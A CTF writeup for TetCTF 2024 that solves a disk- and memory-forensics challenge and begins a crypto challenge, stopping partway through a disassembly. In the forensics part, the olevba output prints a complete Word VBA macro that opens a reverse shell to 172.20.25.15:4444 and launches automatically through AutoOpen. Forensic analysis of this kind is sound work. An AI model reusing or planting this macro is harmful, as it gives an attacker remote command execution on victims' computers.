This contest ran from 2024/1/27 9:00 (JST) to 2024/1/29 9:00 (JST).
We took part as a team again. The result was 300 points, 83rd place out of 838 teams.
Below are writeups for the problems I solved myself.
Welcome (MISCELLANEOUS)
The flag was written on the page at the specified URL.
TetCTF{__Hapi_hapi_HaPi_New_Year__}
TET & 4N6 (MISCELLANEOUS)
The problem statement reads as follows.
1. Find the malicious code and tell me the IP and Port C2
2. What was the first flag you found?
3. After registering an account, I no longer remember anything about my account. Can you help me find and get the second flag?
Format : TetCTF{IP:Port_Flag1_Flag2}
Ex: TetCTF{1.1.1.1:1234_Hello_HappyForensics}
The attached files are a disk image and a memory dump. First, open Backup.ad1 in FTK Imager.
A shortcut to TetCTF2024-Rules is found in C:\Users\Stirring\AppData\Roaming\Microsoft\Windows\Recent, but the file itself does not exist at that path inside the ad1.
Export Normal.dotm from C:\Users\Stirring\AppData\Roaming\Microsoft\Templates.
$ olevba Normal.dotm
olevba 0.60.1 on Python 3.6.9 - http://decalage.info/python/oletools
===============================================================================
FILE: Normal.dotm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'Coppy
Const ip = "172.20.25.15"
Const port = "4444"
Const INVALID_SOCKET = -1
Const WSADESCRIPTION_LEN = 256
Const SOCKET_ERROR = -1

Private Type WSADATA
    wVersion As Integer
    wHighVersion As Integer
    szDescription(0 To WSADESCRIPTION_LEN) As Byte
    szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Private Type ADDRINFO
    ai_flags As Long
    ai_family As Long
    ai_socktype As Long
    ai_protocol As Long
    ai_addrlen As Long
    ai_canonName As LongPtr
    ai_addr As LongPtr
    ai_next As LongPtr
End Type

Private Type STARTUPINFOA
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As String
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

Enum af
    AF_UNSPEC = 0
    AF_INET = 2
    AF_IPX = 6
    AF_APPLETALK = 16
    AF_NETBIOS = 17
    AF_INET6 = 23
    AF_IRDA = 26
    AF_BTH = 32
End Enum

Enum sock_type
    SOCK_STREAM = 1
    SOCK_DGRAM = 2
    SOCK_RAW = 3
    SOCK_RDM = 4
    SOCK_SEQPACKET = 5
End Enum

Private Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long
Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long
Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
Private Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long)
Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long

Function revShell()
    Dim m_wsaData As WSADATA
    Dim m_RetVal As Integer
    Dim m_Hints As ADDRINFO
    Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET
    Dim pAddrInfo As LongPtr
    Dim RetVal As Long
    Dim lastError As Long
    Dim iRC As Long
    Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512

    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
    If (RetVal <> 0) Then
        MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    m_Hints.ai_family = af.AF_UNSPEC
    m_Hints.ai_socktype = sock_type.SOCK_STREAM

    RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo)
    If (RetVal <> 0) Then
        MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    m_Hints.ai_next = pAddrInfo
    Dim connected As Boolean: connected = False
    Do While m_Hints.ai_next > 0
        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)
        m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, ByVal 0&, 0, 0)
        If (m_ConnSocket = INVALID_SOCKET) Then
            revShell = False
        Else
            Dim connectionResult As Long
            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)
            If connectionResult <> SOCKET_ERROR Then
                connected = True
                Exit Do
            End If
            closesocket (m_ConnSocket)
            revShell = False
        End If
    Loop

    If Not connected Then
        revShell = False
        RetVal = closesocket(m_ConnSocket)
        Call WSACleanup
        Exit Function
    End If

    Dim si As STARTUPINFOA
    ZeroMemory si, Len(si)
    si.cb = Len(si)
    si.dwFlags = &H100
    si.hStdInput = m_ConnSocket
    si.hStdOutput = m_ConnSocket
    si.hStdError = m_ConnSocket

    Dim pi As PROCESS_INFORMATION
    Dim worked As LongPtr
    Dim test As Long
    worked = CreateProc(vbNullString, "cmd", ByVal 0&, ByVal 0&, True, &H8000000, 0, vbNullString, si, pi)
    revShell = worked
End Function

Public Function MAKEWORD(Lo As Byte, Hi As Byte) As Integer
    MAKEWORD = Lo + Hi * 256& Or 32768 * (Hi > 127)
End Function

Sub AutoOpen()
    Dim success As Boolean
    success = revShell()
End Sub
'Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Lib                 |May run code from a DLL                      |
|Suspicious|RtlMoveMemory       |May inject code into another process         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |172.20.25.15        |IPv4 address                                 |
|IOC       |ws2_32.dll          |Executable file name                         |
+----------+--------------------+---------------------------------------------+
The C2 IP address and port are set as follows.
Const ip = "172.20.25.15"
Const port = "4444"
There is a base64 string in a comment, so decode it.
$ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d
VlcweE5HRkdjRFpTVkZwS1VteHdSRlZXVFhoVWF6VklWR3hPVGxGVU1Eaz0=
$ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d
VW0xNGFGcDZSVFpKUmxwRFVWTXhUazVIVGxOTlFUMDk=
$ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d | base64 -d
Um14aFp6RTZJRlpDUVMxTk5HTlNNQT09
$ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d | base64 -d | base64 -d
RmxhZzE6IFZCQS1NNGNSMA==
$ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
Flag1: VBA-M4cR0
Flag1 has been found.
Next, look at the memory dump.
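As an added example (not part of the original writeup), the base64 -d chain above done automatically: a small Python helper that pulls base64-looking payloads out of VBA comment lines and peels layers until the output no longer looks like base64. The macro comment string is the one from the olevba output; it yields Flag1 after five layers.

```python
import base64
import binascii
import re

# One base64 layer: only alphabet characters, optional '=' padding, length a multiple of 4.
_B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(data: bytes) -> bool:
    """True if data is non-empty, uses only base64 characters and has a valid length."""
    return len(data) % 4 == 0 and _B64_RE.match(data) is not None


def decode_nested_base64(blob: bytes, max_depth: int = 16):
    """Peel base64 layers until the result is not base64 any more.

    Returns (decoded_bytes, depth), depth being the number of layers removed.
    max_depth guards against short outputs that happen to look like base64
    (e.g. "abcd"), which would otherwise be decoded again and again.
    """
    data = blob.strip()
    depth = 0
    while depth < max_depth and looks_like_base64(data):
        try:
            nxt = base64.b64decode(data, validate=True)
        except binascii.Error:
            break
        if not nxt:
            break
        data, depth = nxt, depth + 1
    return data, depth


def extract_base64_comments(vba_source: str):
    """Collect base64-looking payloads hidden in VBA comment lines (lines starting with ')."""
    found = []
    for line in vba_source.splitlines():
        line = line.strip()
        if line.startswith("'"):
            candidate = line[1:].strip().encode()
            # short comments such as 'Coppy are skipped; real payloads are longer
            if len(candidate) >= 16 and looks_like_base64(candidate):
                found.append(candidate)
    return found


# The comment olevba showed at the end of NewMacros.bas (value taken from the writeup).
MACRO_COMMENT = b"Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9"


if __name__ == "__main__":
    plain, layers = decode_nested_base64(MACRO_COMMENT)
    print(f"{layers} layers -> {plain!r}")
```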
$ volatility -f TETCTF-2024-20240126-203010.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
WARNING : volatility.debug    : Overlay structure cpuinfo_x86 not present in vtypes
          Suggested Profile(s) : Win8SP0x64, Win81U1x64, Win2012R2x64_18340, Win2012R2x64, Win2012x64, Win8SP1x64_18340, Win8SP1x64
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/TETCTF-2024-20240126-203010.raw)
                      PAE type : No PAE
                           DTB : 0x1ab000L
                          KDBG : 0xf8018c2bb530L
          Number of Processors : 8
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8018c318000L
                KPCR for CPU 1 : 0xffffd000cb7b1000L
                KPCR for CPU 2 : 0xffffd000cf844000L
                KPCR for CPU 3 : 0xffffd000cf8ca000L
                KPCR for CPU 4 : 0xffffd000cb744000L
                KPCR for CPU 5 : 0xffffd000cb867000L
                KPCR for CPU 6 : 0xffffd000cb92d000L
                KPCR for CPU 7 : 0xffffd000cb9c0000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2024-01-26 20:30:12 UTC+0000
     Image local date and time : 2024-01-26 12:30:12 -0800

$ volatility -f TETCTF-2024-20240126-203010.raw --profile=Win8SP1x64 pstree
Volatility Foundation Volatility Framework 2.6
Name                                               Pid    PPid   Thds   Hnds   Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0xffffe000f2f82900:wininit.exe 516 440 1 0 2024-01-26 17:06:54 UTC+0000
. 0xffffe000f3031900:services.exe 608 516 3 0 2024-01-26 17:06:54 UTC+0000
.. 0xffffe000f3273400:svchost.exe 512 608 22 0 2024-01-26 17:06:55 UTC+0000
.. 0xffffe000f396b900:dllhost.exe 1968 608 11 0 2024-01-26 17:06:57 UTC+0000
.. 0xffffe000f3347900:spoolsv.exe 1072 608 9 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f2fd2900:svchost.exe 952 608 31 0 2024-01-26 17:06:55 UTC+0000
.. 0xffffe000f3365700:svchost.exe 1108 608 23 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f39dc680:svchost.exe 2136 608 6 0 2024-01-26 17:06:57 UTC+0000
.. 0xffffe000f34ed900:vmtoolsd.exe 1384 608 13 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f3166900:svchost.exe 700 608 10 0 2024-01-26 17:06:55 UTC+0000
... 0xffffe000f3f0a900:WmiPrvSE.exe 6320 700 6 0 2024-01-26 20:30:38 UTC+0000
... 0xffffe000f395b900:WmiPrvSE.exe 2288 700 10 0 2024-01-26 17:06:57 UTC+0000
... 0xffffe000f19cb080:SystemSettings 3952 700 25 0 2024-01-26 17:10:17 UTC+0000
... 0xffffe000f16b9900:RuntimeBroker. 2524 700 2 0 2024-01-26 20:15:02 UTC+0000
... 0xffffe000f0f6a480:dllhost.exe 2556 700 3 0 2024-01-26 17:07:10 UTC+0000
.. 0xffffe000f36274c0:msdtc.exe 2300 608 9 0 2024-01-26 17:06:57 UTC+0000
.. 0xffffe000f0bea900:OfficeClickToR 3844 608 24 0 2024-01-26 17:09:11 UTC+0000
... 0xffffe000f3e5a900:AppVShNotify.e 3820 3844 1 0 2024-01-26 17:12:29 UTC+0000
.. 0xffffe000f2fde900:svchost.exe 728 608 8 0 2024-01-26 17:06:55 UTC+0000
.. 0xffffe000f344e900:VGAuthService. 1316 608 2 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f38e2500:svchost.exe 2012 608 16 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f156e500:msiexec.exe 9148 608 5 0 2024-01-26 20:22:01 UTC+0000
.. 0xffffe000f34ca580:vm3dservice.ex 1360 608 3 0 2024-01-26 17:06:56 UTC+0000
... 0xffffe000f34e8080:vm3dservice.ex 1404 1360 4 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f158f2c0:svchost.exe 8264 608 3 0 2024-01-26 20:22:01 UTC+0000
.. 0xffffe000f2fd4900:svchost.exe 892 608 62 0 2024-01-26 17:06:55 UTC+0000
... 0xffffe000f0eba080:taskhostex.exe 3156 892 8 0 2024-01-26 17:07:17 UTC+0000
... 0xffffe000f3fe0440:taskeng.exe 8076 892 2 0 2024-01-26 20:17:38 UTC+0000
... 0xffffe000f178d080:WMIADAP.exe 8004 892 5 0 2024-01-26 20:30:38 UTC+0000
... 0xffffe000f1297900:taskhost.exe 6056 892 9 0 2024-01-26 17:21:56 UTC+0000
... 0xffffe000f0983900:taskhost.exe 1984 892 6 0 2024-01-26 17:09:02 UTC+0000
.. 0xffffe000f3478080:MsMpEng.exe 1436 608 31 0 2024-01-26 17:06:56 UTC+0000
.. 0xffffe000f40bb900:SearchIndexer. 4536 608 13 0 2024-01-26 17:13:06 UTC+0000
... 0xffffe000f1bb3440:SearchFilterHo 6096 4536 4 0 2024-01-26 20:30:12 UTC+0000
... 0xffffe000f1a63180:SearchProtocol 8088 4536 6 0 2024-01-26 20:30:12 UTC+0000
.. 0xffffe000f31d1900:svchost.exe 848 608 25 0 2024-01-26 17:06:55 UTC+0000
... 0xffffe000f0061900:audiodg.exe 2624 848 4 0 2024-01-26 20:21:58 UTC+0000
.. 0xffffe000f2fd0900:svchost.exe 1000 608 26 0 2024-01-26 17:06:55 UTC+0000
... 0xffffe000f39d2900:WUDFHost.exe 2156 1000 6 0 2024-01-26 17:06:57 UTC+0000
... 0xffffe000f3654640:dasHost.exe 2336 1000 8 0 2024-01-26 17:06:57 UTC+0000
... 0xffffe000f18a1900:WUDFHost.exe 7120 1000 9 0 2024-01-26 20:20:49 UTC+0000
. 0xffffe000f3067080:lsass.exe 624 516 6 0 2024-01-26 17:06:54 UTC+0000
 0xffffe000f29034c0:csrss.exe 460 440 10 0 2024-01-26 17:06:54 UTC+0000
 0xffffe000f0ff6080:explorer.exe 3276 3268 73 0 2024-01-26 17:07:18 UTC+0000
. 0xffffe000f1c41080:chrome.exe 3108 3276 29 0 2024-01-26 17:16:14 UTC+0000
.. 0xffffe000f16f5900:chrome.exe 3328 3108 16 0 2024-01-26 20:14:33 UTC+0000
.. 0xffffe000f1449900:chrome.exe 3592 3108 20 0 2024-01-26 17:22:51 UTC+0000
.. 0xffffe000f1430900:chrome.exe 2080 3108 19 0 2024-01-26 17:16:25 UTC+0000
.. 0xffffe000f067f900:chrome.exe 3112 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f1623080:chrome.exe 7176 3108 16 0 2024-01-26 20:15:21 UTC+0000
.. 0xffffe000f3e32900:chrome.exe 2100 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f05bb900:chrome.exe 4704 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f19f4080:chrome.exe 5560 3108 16 0 2024-01-26 17:22:28 UTC+0000
.. 0xffffe000f36b7080:chrome.exe 4680 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f0a8f900:chrome.exe 6732 3108 16 0 2024-01-26 17:22:35 UTC+0000
.. 0xffffe000f0a76900:chrome.exe 8804 3108 16 0 2024-01-26 20:16:00 UTC+0000
.. 0xffffe000f1bd7680:chrome.exe 6844 3108 16 0 2024-01-26 17:22:35 UTC+0000
.. 0xffffe000f1c26580:chrome.exe 3692 3108 7 0 2024-01-26 17:16:17 UTC+0000
.. 0xffffe000f3d75700:chrome.exe 1300 3108 16 0 2024-01-26 20:15:21 UTC+0000
.. 0xffffe000f2050080:chrome.exe 5920 3108 16 0 2024-01-26 20:15:15 UTC+0000
.. 0xffffe000f080b900:chrome.exe 1152 3108 16 0 2024-01-26 20:15:21 UTC+0000
.. 0xffffe000f431b900:chrome.exe 2716 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f0b8f440:chrome.exe 160 3108 17 0 2024-01-26 20:14:27 UTC+0000
.. 0xffffe000f19af900:chrome.exe 2216 3108 7 0 2024-01-26 17:16:14 UTC+0000
.. 0xffffe000f1b10900:chrome.exe 8372 3108 16 0 2024-01-26 20:15:44 UTC+0000
.. 0xffffe000f101b900:chrome.exe 8888 3108 16 0 2024-01-26 20:16:02 UTC+0000
.. 0xffffe000f05c1900:chrome.exe 2752 3108 16 0 2024-01-26 20:15:19 UTC+0000
.. 0xffffe000f19c7900:chrome.exe 1568 3108 16 0 2024-01-26 20:15:14 UTC+0000
.. 0xffffe000f1a8e400:chrome.exe 2632 3108 16 0 2024-01-26 20:15:20 UTC+0000
.. 0xffffe000f14c9080:chrome.exe 6092 3108 16 0 2024-01-26 17:22:42 UTC+0000
.. 0xffffe000f083f780:chrome.exe 3960 3108 16 0 2024-01-26 20:15:21 UTC+0000
.. 0xffffe000f1650900:chrome.exe 4824 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f1464900:chrome.exe 2272 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f0af7900:chrome.exe 7912 3108 16 0 2024-01-26 20:15:43 UTC+0000
.. 0xffffe000f0679900:chrome.exe 6400 3108 16 0 2024-01-26 17:22:59 UTC+0000
.. 0xffffe000f1396480:chrome.exe 2868 3108 16 0 2024-01-26 20:15:20 UTC+0000
.. 0xffffe000f1248900:chrome.exe 4920 3108 16 0 2024-01-26 17:22:30 UTC+0000
.. 0xffffe000f2b13100:chrome.exe 4932 3108 16 0 2024-01-26 20:14:42 UTC+0000
.. 0xffffe000f3b75080:chrome.exe 5448 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f14a2900:chrome.exe 5432 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f176a080:chrome.exe 2388 3108 16 0 2024-01-26 17:22:33 UTC+0000
.. 0xffffe000f068d080:chrome.exe 5976 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f0a74900:chrome.exe 9188 3108 16 0 2024-01-26 20:16:12 UTC+0000
.. 0xffffe000f37f5900:chrome.exe 9060 3108 16 0 2024-01-26 20:16:11 UTC+0000
.. 0xffffe000f0890200:chrome.exe 5992 3108 7 0 2024-01-26 17:22:33 UTC+0000
.. 0xffffe000f1461900:chrome.exe 8980 3108 16 0 2024-01-26 20:16:10 UTC+0000
.. 0xffffe000f1b2a900:chrome.exe 7032 3108 16 0 2024-01-26 17:22:37 UTC+0000
.. 0xffffe000f17ac900:chrome.exe 7232 3108 16 0 2024-01-26 20:15:43 UTC+0000
.. 0xffffe000f3ebd900:chrome.exe 8452 3108 16 0 2024-01-26 20:15:46 UTC+0000
.. 0xffffe000f058b900:chrome.exe 7048 3108 16 0 2024-01-26 17:22:37 UTC+0000
.. 0xffffe000f143d900:chrome.exe 8608 3108 16 0 2024-01-26 20:15:49 UTC+0000
.. 0xffffe000f06a7840:chrome.exe 7836 3108 16 0 2024-01-26 20:15:40 UTC+0000
.. 0xffffe000f05aa900:chrome.exe 2992 3108 18 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f2abf540:chrome.exe 4168 3108 12 0 2024-01-26 17:16:16 UTC+0000
.. 0xffffe000f0959080:chrome.exe 2492 3108 16 0 2024-01-26 17:22:33 UTC+0000
.. 0xffffe000f13e9900:WINWORD.EXE 1992 3108 36 0 2024-01-26 17:23:04 UTC+0000
... 0xffffe000f2f9d4c0:cmd.exe 5212 1992 1 0 2024-01-26 20:13:25 UTC+0000
.... 0xffffe000f1b26080:conhost.exe 6796 5212 1 0 2024-01-26 20:13:25 UTC+0000
... 0xffffe000f3f64380:ai.exe 5396 1992 0 ------ 2024-01-26 17:23:09 UTC+0000
... 0xffffe000f0fce900:cmd.exe 5004 1992 0 ------ 2024-01-26 17:25:24 UTC+0000
.. 0xffffe000f085b340:chrome.exe 4052 3108 20 0 2024-01-26 17:16:16 UTC+0000
.. 0xffffe000f0e43400:chrome.exe 996 3108 16 0 2024-01-26 17:22:33 UTC+0000
.. 0xffffe000f1d40900:chrome.exe 6636 3108 16 0 2024-01-26 20:15:21 UTC+0000
.. 0xffffe000f3379080:chrome.exe 4080 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f068d900:chrome.exe 3572 3108 16 0 2024-01-26 17:22:34 UTC+0000
.. 0xffffe000f1bb21c0:chrome.exe 6648 3108 16 0 2024-01-26 17:22:35 UTC+0000
.. 0xffffe000f15d5900:chrome.exe 4436 3108 16 0 2024-01-26 17:22:34 UTC+0000
. 0xffffe000f1073900:vmtoolsd.exe 3868 3276 10 0 2024-01-26 17:07:29 UTC+0000
. 0xffffe000f198b080:DumpIt.exe 7516 3276 3 0 2024-01-26 20:30:10 UTC+0000
.. 0xffffe000f3c3a4c0:conhost.exe 7140 7516 2 0 2024-01-26 20:30:10 UTC+0000
 0xffffe000f00ae900:System 4 0 143 0 2024-01-26 17:06:38 UTC+0000
. 0xffffe000f284c040:smss.exe 352 4 2 0 2024-01-26 17:06:38 UTC+0000
 0xffffe000f2f7e080:csrss.exe 524 508 11 0 2024-01-26 17:06:54 UTC+0000
 0xffffe000f2fab080:winlogon.exe 568 508 4 0 2024-01-26 17:06:54 UTC+0000
. 0xffffe000f319e800:dwm.exe 832 568 7 0 2024-01-26 17:06:55 UTC+0000
 0xffffe000f40ce480:GoogleCrashHan 3884 2344 3 0 2024-01-26 17:13:06 UTC+0000
 0xffffe000f40b6900:GoogleCrashHan 4844 2344 3 0 2024-01-26 17:13:06 UTC+0000
The browser in use appears to be Chrome, so look at its browsing history.
$ volatility --plugins=../plugins -f TETCTF-2024-20240126-203010.raw --profile=Win8SP1x64 chromehistory
Volatility Foundation Volatility Framework 2.6
Index  URL  Title  Visits  Typed  Last Visit Time  Hidden  Favicon ID
------ ---- ----- ------ ----- -------------------------- ------ ----------
19 https://pastebin.com/XRnpj2ja Flag 2: R3c0v3rry_34sy_R1ght? - Pastebin.com 2 0 2024-01-26 20:18:22.955264 N/A
13 https://pastebin.com/ Pastebin.com - #1 paste tool since 2002! 2 1 2024-01-26 20:17:18.361015 N/A
18 https://pastebin.com/u/tecij23311 Tecij23311's Pastebin - Pastebin.com 1 0 2024-01-26 20:17:15.028515 N/A
17 https://pastebin.com/login Pastebin.com - Login Page 1 0 2024-01-26 20:17:10.822121 N/A
16 https://pastebin.com/signup?__cf_chl_tk...UjPOCzdbM8xOw-1706300078-0-gaNycGzNDmU Just a moment... 1 0 2024-01-26 20:14:42.355274 N/A
15 https://pastebin.com/signup?__cf_chl_rt...UjPOCzdbM8xOw-1706300078-0-gaNycGzNDmU Just a moment... 1 0 2024-01-26 20:14:37.391253 N/A
6 https://pastebin.com/pusYyfAS TETCTF{flag} - Pastebin.com 2 1 2024-01-26 20:14:27.935153 N/A
11 https://ctf.hackemall.live/login TetCTF 2024 1 0 2024-01-26 20:14:01.418279 N/A
10 https://ctf.hackemall.live/register TetCTF 2024 1 0 2024-01-26 17:22:55.468108 N/A
9 https://ctf.hackemall.live/ TetCTF 2024 1 1 2024-01-26 17:22:52.236375 N/A
7 https://file.io/eKHCxsHdpFZc Download | file.io 1 0 2024-01-26 17:22:26.564913 N/A
8 https://www.file.io/GN6v/download/eKHCxsHdpFZc Download | file.io 1 0 2024-01-26 17:22:26.564913 N/A
14 https://pastebin.com/signup Pastebin.com - Sign Up Page 4 0 2024-01-26 20:15:52.888105 N/A
5 https://www.youtube.com/watch?v=gOtfJ151ue4 Tết Đong Đầy | KHOA x Kay Tran x Duck V | HOMIE BOIZ OFFICIAL - YouTube 1 0 2024-01-26 17:14:22.719342 N/A
3 https://youtube.com/ YouTube 1 0 2024-01-26 17:13:32.898449 N/A
1 https://accounts.google.com/signin/chro...ntinue=https%3A%2F%2Fwww.google.com%2F Sign in - Google Accounts 1 0 2024-01-26 17:13:29.301396 N/A
4 https://www.youtube.com/ YouTube 1 0 2024-01-26 17:13:32.898449 N/A
2 https://accounts.google.com/v3/signin/i...ync&dsh=S1963595838%3A1706289209093139 Sign in - Google Accounts 2 0 2024-01-26 17:13:30.531512 N/A
Flag 2 has been found.
TetCTF{172.20.25.15:4444_VBA-M4cR0_R3c0v3rry_34sy_R1ght?}
flip (CRYPTO)
An overview of the server's processing:
・OFFSET_PLAINTEXT = 0x4010
・OFFSET_KEY = 0x4020
・key: a random 16-byte string
・content: the contents of encrypt as a bytearray
・plaintext_hex, i_str, j_str: the input string split into three parts on spaces
・pt: the hex-decoded plaintext_hex
・check that pt is 16 bytes long
・i: i_str converted to an integer
・check that i is at least 0 and less than the length of content
・j: j_str converted to an integer
・check that j is at least 0 and less than 8
・content[OFFSET_KEY:OFFSET_KEY + 16] = key
・content[OFFSET_PLAINTEXT:OFFSET_PLAINTEXT + 16] = pt
・content[i] = content[i] ^ (1 << j)
・tmpfile: a temporary file object
・write content to the temporary file
・ciphertext: the output of executing the temporary file
・print ciphertext in hexadecimal
・if the hex-decoded input string matches key, print the flag
Disassemble encrypt with Ghidra.
**************************************************************
*                          FUNCTION                          *
**************************************************************
undefined main()
  undefined         AL:1            <RETURN>
  undefined8        Stack[-0x10]:8  local_10     XREF[2]:     00101181(W), 001011d7(R)
  undefined1        Stack[-0xd8]:1  local_d8     XREF[2]:     00101187(*), 001011a0(*)
main                                             XREF[4]:     Entry Point(*), _start:00101098(*), 00103258, 00103390(*)
00101169 f3 0f 1e fa                  ENDBR64
0010116d 55                           PUSH   RBP
0010116e 48 89 e5                     MOV    RBP,RSP
00101171 48 81 ec d0 00 00 00         SUB    RSP,0xd0
00101178 64 48 8b 04 25 28 00 00 00   MOV    RAX,qword ptr FS:[0x28]
00101181 48 89 45 f8                  MOV    qword ptr [RBP + local_10],RAX
00101185 31 c0                        XOR    EAX,EAX
00101187 48 8d 85 30 ff ff ff         LEA    RAX=>local_d8,[RBP + -0xd0]
0010118e 48 8d 15 8b 3e 00 00         LEA    RDX,[key]
00101195 48 89 d6                     MOV    RSI=>key,RDX
00101198 48 89 c7                     MOV    RDI,RAX
0010119b e8 0c 03 00 00               CALL   AES_init_ctx                     undefined AES_init_ctx()
001011a0 48 8d 85 30 ff ff ff         LEA    RAX=>local_d8,[RBP + -0xd0]
001011a7 48 8d 15 62 3e 00 00         LEA    RDX,[plaintext]
001011ae 48 89 d6                     MOV    RSI=>plaintext,RDX
001011b1 48 89 c7                     MOV    RDI,RAX
001011b4 e8 dc 11 00 00               CALL   AES_ECB_encrypt                  undefined AES_ECB_encrypt()
001011b9 ba 10 00 00 00               MOV    EDX,0x10
001011be 48 8d 05 4b 3e 00 00         LEA    RAX,[plaintext]
